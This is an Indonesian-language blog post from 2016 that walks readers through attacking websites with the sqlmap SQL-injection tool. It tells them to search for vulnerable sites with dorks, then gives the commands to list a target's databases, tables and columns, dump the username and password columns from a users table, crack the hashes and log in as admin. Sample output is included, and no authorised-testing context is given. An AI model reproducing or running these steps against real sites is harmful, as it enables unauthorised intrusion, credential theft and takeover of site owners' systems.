Author : UnknownTidak ada komentar
Hello,.. ^_^
hanya sekedar ingin berbagi ilmu, kali ini Team Malaikat Tersakiti akan share tentang sqli otomatis menggunakan sqlmap di windows.
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
ok, langsung saja download dulu alat perang nya :
-python 2.7
-sqlmap-0.9.zip
untuk tutorialnya :
1. download kedua file di atas, instal python, extrack sqlmap nya
(misalkan saya extrack di C:\Python27\tool\sqlmap)
2. cari website yg vuln terhadap sqli, (untuk dork bisa lihat di sini)
ok, saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di om google
3. buka cmd (haruskah daku memberitahu caranya -_- )
setelah itu ketik di cmd "cd [direktori sqlmap tadi yg anda extract]" lalu enter,..
misalnya di sini direktori saya >> C:\Python27\tool\sqlmap
jadi seperti ini :
4. setelah itu masukan perintah : "sqlmap.py -u https://www.target.com/index.php?id=7 --dbs" tanpa tanda petik lalu enter,..
*yang berwarna biru ganti dengan url target mu
*perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.
maka hasilnya akan seperti ini :
jika muncul pertanyan sejenis atau serupa/sebentuk dan seperti ini
"GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter
kita telah mendapatkan nama databasenya yaitu :
1.*yang saya sensor(dalam hal ini kita namakan saja db_xxx)
2. information_schema
5. setelah itu saat nya kita bongkar isinya , tapi database yang mana ? hmm,...
sepertinya saya tertarik dengan yang db_xxx , kenapa hayoo ? feeling aja :p
lalu kita masukan perintah ini :
sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx --tables [enter]
* yang warna biru url target
* yang warna hijau nama database yang mau di bongkar
fungsi :
-u = url
-D = database
--tables = untuk mendapatkan tables dari database
maka hasilnya seperti ini :
wuihh muncul tablenya xD
[11 tables]
+-------------------+
| areas |
| categories |
| featured |
| fields |
| jobfields |
| member_areas |
| member_categories |
| member_fields |
| members |
| projects |
| users |
+-------------------+
6. sekarang kita lihat dari tabel2 tersebut kira kira user dimna ? , mungkin di tabel user :v
mari kita check dengan perintah:
sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users --columns [enter]
* yang warna merah, nama tabel yang ingin dilihat columnnya
fungsi :
-T = nama table
--columns = melihat columns di table
maka hasilnya akan seperti ini :
kita telah mendapat kan nama column dari tabel users
7. sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi dari column password dan username saja, dengan memasukan perintah :
sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users -C password,username --dump
*yang warna pink, nama column yang ingin dilihat datanya
fungsi :
-C = nama column
--dump = melihat data di column
maka hasilnya seperti ini :
dan tadaaa,... \(^_^)/
kita dapet username ama passwordnya(password masih dalam bentuk hash, jadi tinggal hash di DI SINI
sekarang tinggal ngecrack passwordnya terus cari admin loginnya >> tebass 3:)
JANGAN LUPA SHARE AND KOMEN :D
Artikel Terkait
Posted On : Senin, 11 Juli 2016Time : 06.47